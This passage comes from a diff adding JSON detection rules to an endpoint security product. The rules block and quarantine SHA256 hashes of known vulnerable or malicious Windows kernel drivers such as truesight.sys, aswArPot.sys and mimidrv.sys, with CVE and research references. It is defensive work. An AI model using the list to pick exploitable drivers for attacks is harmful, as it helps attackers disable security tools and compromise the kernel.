"ec81b458b41c9732341ec8cde57b9b7c7bb776b3bc08f45f2c815c3692072d04", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cf026a4d-e788-5d2a-a157-7354c9e53923", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144038Z", + "creation_date": 
"2026-03-23T11:45:31.144040Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144045Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c1f0efdda4b3e0a25457fc1a9237178ba2d0694995bad02037a66817dba0cd39", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cf1e4dbc-121f-5771-9935-0a2131b1108a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608457Z", + "creation_date": "2026-03-23T11:45:29.608459Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608464Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "26f41e4268be59f5de07552b51fa52d18d88be94f8895eb4a16de0f3940cf712", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"cf215a79-7265-5fbc-9ca3-891dc9afe758", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833012Z", + "creation_date": "2026-03-23T11:45:30.833015Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833023Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "403e06568d2765f574287db1ce1e706ee56234df7da5d57d963cdd2e8c50d72d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cf29956d-0174-507e-8cc3-68436f27a990", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457776Z", + "creation_date": "2026-03-23T11:45:30.457779Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.457787Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c6feb3f4932387df7598e29d4f5bdacec0b9ce98db3f51d96fc4ffdcc6eb10e1", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cf413540-5fe9-517a-8470-0f3946ba545e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618168Z", + "creation_date": "2026-03-23T11:45:29.618170Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618175Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7ef8949637cb947f1a4e1d4e68d31d1385a600d1b1054b53e7417767461fafa7", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cf42b340-1c68-5cef-ae74-158eade282dc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474712Z", + "creation_date": "2026-03-23T11:45:30.474715Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474725Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7699613119b25fc5886305e43ff556f8d53560cfa7707ab456f3165ba4ea374b", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cf4551db-2202-5282-906c-a1dcd7b13132", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141328Z", + "creation_date": "2026-03-23T11:45:31.141330Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141335Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"ff9ad483752fcd68f51fa798194a3b6df55fb4332ca10cb24bb7e98b168396b4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cf519a83-54d3-501f-aca9-a94796c94a66", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968476Z", + "creation_date": "2026-03-23T11:45:29.968478Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968483Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "06aabaeb78213f66d119a699db7602d841ae7f6b9ec9100b1a534abe5709e516", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cf5544fd-e310-5d14-b670-5d450cc451cb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498036Z", + "creation_date": "2026-03-23T11:45:31.498039Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498047Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "94131b5c56a10bc562b15eb3966c4481b165737118a6e1102e67ff291308cf38", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cf633852-1fbf-5ed3-9844-6e462ea345eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452542Z", + "creation_date": "2026-03-23T11:45:30.452545Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452553Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0c1b21978c6aef881f056f7b9c909b56488019459ed256511d78a4588d1aa7a4", + "comment": "Vulnerable Kernel Driver (aka skill.sys) 
[https://www.loldrivers.io/drivers/724d7989-dfce-4bb2-9beb-dee15df5b790/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cf653a27-05dc-58e7-859a-7fa059ada47f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145342Z", + "creation_date": "2026-03-23T11:45:31.145344Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145350Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "15f91017e60f244aff3a7449dcb0e1480bc14e91e1a4f118a98e6610c2c962e7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cf6561a1-5268-5c4b-a666-952c1b028212", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468799Z", + "creation_date": 
"2026-03-23T11:45:30.468802Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468810Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "612aa28d12aefd2af8565d4df6df9caa61b5fe8370fffb08933c03d558789e37", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cf66bd11-8baa-5d17-a944-8792c1addf22", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979829Z", + "creation_date": "2026-03-23T11:45:29.979831Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979836Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d7bc7306cb489fe4c285bbeddc6d1a09e814ef55cf30bd5b8daf87a52396f102", + "comment": "Vulnerable Kernel Driver (aka nt4.sys) [https://www.loldrivers.io/drivers/1d4f7a3a-786b-4a74-b34f-14d44343de9e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cf6a53c0-d91c-57dc-9dfa-3ced6a9757ec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497578Z", + "creation_date": "2026-03-23T11:45:31.497580Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497586Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "62593294a57baf97ad7d8982aa250db537da892593d773515722e70e6784947b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cf6fe948-eec2-5996-939a-58b94289fa11", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457158Z", + "creation_date": "2026-03-23T11:45:30.457161Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457170Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "14e6f0d5f93dc52471af549de1c91c1fc1d9dbd175d5932c17e58e6b186694c9", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cf72ddce-1688-58ed-9801-84eaa892dd87", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818789Z", + "creation_date": "2026-03-23T11:45:30.818792Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818797Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "56135fb8d5d3ed93b38679cb0dea9cc16ed7fdb0db9659e40a5c2d82655ada67", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cf8df38b-9ccd-5795-ab73-4daaa8189c56", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972755Z", + "creation_date": "2026-03-23T11:45:29.972757Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972762Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ac42c7b1d9feccd48c305698942186d580b7bfd047bb73dbf028f3fed7aa24ad", + "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cf8f8d4a-c6d9-57a3-8e85-99113b42dc1a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984441Z", + "creation_date": "2026-03-23T11:45:29.984443Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984448Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e2c531a771b0df1585518a22427798e86611e6be3d357024797871a1b3876e9c", + "comment": 
"Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cf99055d-19ab-5f41-a9b6-92daaba1144d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482590Z", + "creation_date": "2026-03-23T11:45:31.482594Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.482603Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0d8627fccac3c1c6ad9926a28fdafd207bfd5022e8e927a7004928fb06b34b2c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cf9db006-a4e9-56e5-bf08-ab11b6c06eb9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.452050Z", + "creation_date": "2026-03-23T11:45:30.452069Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452090Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "235ab6981b521a424026926ad7f5d19a188e17491933e76269ad9a17a79ccc24", + "comment": "Vulnerable Kernel Driver (aka VBoxUSBMon.sys) [https://www.loldrivers.io/drivers/babe348d-f160-41ec-9db9-2413b989c1f0/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cfb00a78-ae16-5cff-8e35-f551658c2d42", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148503Z", + "creation_date": "2026-03-23T11:45:31.148504Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148510Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f76ca1c2916e039a9e9bf78005cdb54be966e01c2434022e866d419b2b0aca80", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + 
"id": "cfcaf0fe-f7bb-5a67-8d07-f62b9fb4921a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618734Z", + "creation_date": "2026-03-23T11:45:29.618737Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618746Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "057e6a58e3515e56eab85ccb8ec5086552b7de98c886c37f6a5284c002615565", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cfce64ea-e15c-5eb3-b2bc-013fdae358f8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469262Z", + "creation_date": "2026-03-23T11:45:30.469265Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469275Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3bafb4e11a3823b3455728e938c69103dd4ff414529d9579b38b5ee12f77bce0", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cfda00f0-44ea-59f4-9f4c-cb16e21acf28", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147695Z", + "creation_date": "2026-03-23T11:45:31.147698Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147706Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b6c4dd4cd8cd166a25ed08508864d26fdc309b84009c1431e3e44c6c733b5cbf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cfe2b979-e437-5182-92a4-3b9c2bed0182", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
